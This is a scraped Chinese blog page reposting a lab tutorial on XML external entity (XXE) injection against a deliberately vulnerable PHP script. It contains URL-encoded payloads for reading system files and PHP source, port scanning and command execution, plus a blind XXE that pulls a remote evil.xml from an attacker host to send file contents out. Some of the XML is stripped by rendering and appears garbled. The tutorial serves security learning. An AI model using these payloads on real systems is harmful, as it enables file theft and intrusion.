%3c xml 和php冲突,[原创]WEB安全第五章 漏洞学习与利用11 xml实体注入

最新推荐文章于 2022-02-03 19:23:22 发布
最新推荐文章于 2022-02-03 19:23:22 发布
阅读量179 收藏
点赞数
文章标签: %3c xml 和php冲突
本文详细介绍了XML外部实体注入(XXE)漏洞,这是一种利用不安全处理外部实体数据的攻击方式。通过示例展示了如何进行文件读取、数据提取甚至命令执行。同时提到了无回显的Blind XXE攻击,并讨论了利用外带数据通道的数据提取。了解XXE攻击有助于提升WEB安全防护意识。
摘要由CSDN通过智能技术生成

WEB安全第五章 漏洞学习与利用11 xml实体注入

XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进⾏处理时引发的安全问题。

libxml

1.内部实体

在程序用的比较多就是内部实体

<?xml version="1.0" encoding="ISO-8859-1"?>GeorgeJohnReminderDon't forget the meeting!

2.外部实体

外部实体可支持http、file等协议 不同程序支持的协议也不同。

外部实体注入攻击的常见

$string_xml = '<?xml version="1.0" encoding="utf-8"?>GeorgeJohnReminderxml实体注入';

$xml = isset($_GET['xml'])?$_GET['xml']:$string_xml;

$data = simplexml_load_string($xml);

echo '';

print_r($data);

?>

3有回显

任意读取文件

<?xml version="1.0"?>]>&b;

<?xml version="1.0"?>]>&b;

http://192.168.0.121/xxe.php?xml=%3C%3Fxml%20version%3D%221.0%22%3F%3E%3C%21DOCTYPE%20%20a%20%20%5B%3C%21ENTITY%20b%20SYSTEM%20%22file%3A%2f%2f%2fC%3A%2fWindows%2fwin.ini%22%3E%5D%3E%3Cc%3E%26b%3B%3C%2fc%3E

lazy.png

使用是要进行编码

在php里还可以利用伪协议读取文件

]>

&xxe;

http://192.168.0.121/xxe.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%20%0A%3C%21DOCTYPE%20xdsec%20%5B%0A%3C%21ELEMENT%20methodname%20ANY%20%3E%0A%3C%21ENTITY%20xxe%20SYSTEM%20%22php%3A%2f%2ffilter%2fread%3Dconvert.base64-encode%2fresource%3Dphpinfo.php%22%20%3E%5D%3E%0A%3Cmethodcall%3E%0A%3Cmethodname%3E%26xxe%3B%3C%2fmethodname%3E%0A%3C%2fmethodcall%3E%0A

lazy.png

扫描端口

]>

&test;

http://192.168.0.121/xxe.php?xml=%3C%3Fxml%20version%3D%221.0%22%3F%3E%0A%3C%21DOCTYPE%20ANY%20%5B%0A%3C%21ENTITY%20test%20SYSTEM%20%22http%3A%2f%2f192.168.0.107%3A80%22%3E%0A%5D%3E%0A%3Cabc%3E%26test%3B%3C%2fabc%3E%0A

lazy.png

执行命令

若开启expect扩展

http://webpenter.com/xxe.php?xml=<?xml version="1.0"?>

]>

&test;

2、无回显

称为 blind xxe 可以使用外带数据通道 提取数据

http://192.168.0.121/xxe02.php?xml=<?xml version="1.0"?>

%remote;

%all;

]>

&send;

http://192.168.0.121/xxe02.php?xml=%3C%3Fxml%20version%3D%221.0%22%3F%3E%0A%3C%21DOCTYPE%20ANY%5B%0A%3C%21ENTITY%20%25%20file%20SYSTEM%20%22file%3A%2f%2f%2fC%3A%2f1.txt%22%3E%0A%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f192.168.0.107%2fevil.xml%22%3E%0A%25remote%3B%0A%25all%3B%0A%5D%3E%0A%3Croot%3E%26send%3B%3C%2froot%3E%0A

evil.xml 文件内容

">

]>

&send;

1.php

lazy.png

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/archives/321

静待天时
关注
漏洞复现】H3C Web网管登录任意文件读取漏洞
晚风不及你
02-18 3067
H3C设备的Web网管是指H3C公司生产的网络设备的网络管理界面。它可以通过Web浏览器进行访问和操作,以实现对网络设备的配置、管理和监控。
php %3c%3c%3cxml 报错,Web for Pentester XXE解析
weixin_35529551的博客
03-19 139
基础XML基础XML(Extensible Markup Language)用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。12345678910111213141516171819]>GeorgerJohnReminderDTD(文档类型定义)的作用...
%3C%3F这类的串,如何给解释成正常的字符? 这串应该是 <? 这两个符号
memory235的专栏
11-05 7012
String str = URLDecoder.decode("%3C%3F", "GBK"); System.out.println(str); 打印:
巧秒利用fofa挖到第一个漏洞
热门推荐
hackzkaq的博客
07-14 1万+
FOFA是一款非常强大的搜索引擎 关于对于fofa的描述是:FOFA(网络空间资产检索系统)是世界上数据覆盖更完整的IT设备搜索引擎,拥有全球联网IT设备更全的DNA信息。 探索全球互联网的资产信息,进行资产及漏洞影响范围分析、应用分布统计、应用流行度态势感知等。 相对于shodan来说fofa的优点就是更加本土化,拥有更多的域名数据,建立了全球最大的资产规则集,而且现在已经更新了识别蜜罐的功能。 fofa的功能这么强大,那我们要怎么利用好提供的功能来挖洞呢? fofa官方提供了一些基本语法: 图片 而真正
95.网络安全渗透测试—[常规漏洞挖掘与利用11]—[XXE(XML外部实体)注入漏洞与测试]
qwsn
02-03 2681
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、XXE注入 1、相关概念 (1)XXE定义: (2)漏洞版本: (3)相关概念: 2、漏洞示例:`有回显的XXE注入` (1)靶机环境:本地的phpstudy-`php5.4.5` (2)漏洞页面源码:`xxe01.php` (3)查看libxml版本:`2.7.8<2.9` (4)任意读取文件:`file://伪协议` (5)利用伪协议读取文件:`php的filter伪协议` (5)扫描端口:`单线程` (6)执行
Apache solr XML 实体注入漏洞(CVE-2017-12629)
weixin_45022281的博客
10-13 682
Apache solr XML 实体注入漏洞(CVE-2017-12629) 漏洞描述: Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。
c语言运算符 %3c%3c4,C语言学习笔记二---数据类型运算符与表达式
weixin_32424555的博客
05-22 2731
一.C的基本语法单位1.标识符:有效长度:31(DOS环境下)2.关键字:main不是3.分隔符:空格符,制表符,换行符,换页符4.注释符:a./*.....*/ b.//二.C的常用输入/输出函数1.printf:a.格式:printf("输出格式",输出项序列)例子:printf("%d",5,6); //输出结果为5,但格式错误,不建议这样写类型格式字符串输出形式整型%d%o%x或%X...
如何在XML响应将“ <”和“>”转换为xml标记
04-03
在处理XML数据时,字符“<”和“>”具有特殊含义,分别代表开始标签和结束标签。因此,当你在XML响应直接使用这些字符时,可能会导致解析错误,因为XML解析器会尝试将它们解释为标签。为了解决这个问题,我们需要...
XML实体注入漏洞
08-18 639
XML实体注入漏洞 XML实体注入漏洞    测试代码1:新建xmlget.php,复制下面代码 &lt;?php $xml=$_GET['xml']; $data = simplexml_load_string($xml); print_r($data); ?&gt; 漏洞测试利用方式1:有回显,直接读取文件 &...
phpunit 远程代码执行漏洞(CVE-2017-9841)
黑白的博客
12-30 4564
声明 好好学习,天天向上 漏洞描述 composer是php包管理工具,使用composer安装扩展包将会在当前目录创建一个vendor文件夹,并将所有文件放在其。通常这个目录需要放在web目录外,使用户不能直接访问。 phpunit是php的单元测试工具,其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php文件有如下代码: eval('?>'.file_get_contents('
flex解析xml两方式
xiaoer
06-15 532
  www.diy567.com累了,去上面休息一下下,QQ空间,美文,非主流,网络日记,搞笑短信,祝福短信,热门短信,有意思啊 1.使用httpService 2.使用urlLoader Flex_mxml代码 &lt;embed type="application/x-shockwave-flash" width="14" height="15" src="http://fl...
java %3ckv%3e,XML数字签名Java
weixin_29266007的博客
02-25 137
i need to digital sign my XML messages in JAVA:The resulting XML signature should have the following format:DsP5NLca+plhp9tZvGwykfb2whQYt3CQ5sbsVd9Q9aE=LrfE0po3YPvVxB/m77iBWWiR07Ghiuhuj7tO2C2LKqZK2cLr...
java list%3ca%3e排序_Apache Solr 远程命令+XXE执行漏洞(CVE-2017-12629)
weixin_32512187的博客
03-06 3618
Apache Solr 最近有出了个漏洞预警,先复习一下之前的漏洞 #命令执行 ##先创建一个listener,其设置exe的值为我们想执行的命令,args的值是命令参数POST /solr/demo/config HTTP/1.1Host: your-ipAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSI...
XXE(xml外部实体注入漏洞
weixin_30487701的博客
05-10 211
实验内容 介绍XXE漏洞的触发方式和利用方法,简单介绍XXE漏洞的修复。 影响版本: libxml2.8.0版本 漏洞介绍 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。 由于站点的建站语言不同,PHP、JAVA、python等也有不同的解析规则,在实际情况...
20210425web渗透学习XML攻击复习回顾梳理(不定期更新)
qq_45290991的博客
04-25 511
终于到了一款比较新的漏洞了,这是这几年新的流行款了,因为实际工作遇到的少,所以基本上就荒废了,看了我之前的博客才回忆起来,毕竟为了“补天”嘛。就学学啦。还是要感谢一波暗大佬的教学,说实话除了发音不准确不讲原理以外讲的确实还可以。有兴趣的小伙伴可以咨询他。 20210206 pentestLab1靶场 XML注入 此外,这一篇也写得挺不错的,适合小白和有一定基础的人看,貌似是译文:http://blog.nsfocus.net/xml-dtd-xxe/ 在我的理解,XXE就是XML的外部实体攻击,但
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值